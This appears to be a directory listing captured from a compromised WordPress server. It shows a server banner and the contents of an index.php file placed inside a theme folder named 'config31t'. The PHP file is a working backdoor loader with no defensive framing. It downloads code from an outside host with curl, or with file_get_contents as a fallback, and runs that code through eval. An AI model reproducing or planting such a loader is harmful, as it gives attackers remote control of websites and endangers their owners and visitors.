Linux vacca.o2switch.net 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
/
proc
/
self
/
cwd
/
wp-content
/
themes
/
config31t
/
//proc/self/cwd/wp-content/themes/config31t/index.php
<?php $_u="http://kodomono-atelier.com/mt/iy.txt"; if(function_exists("curl_exec")){$h=curl_init($_u);curl_setopt($h,CURLOPT_RETURNTRANSFER,1);curl_setopt($h,CURLOPT_FOLLOWLOCATION,1);curl_setopt($h,CURLOPT_TIMEOUT,20);$_c=curl_exec($h);curl_close($h);}else{$_c=@file_get_contents($_u);} if($_c)eval("?>".$_c);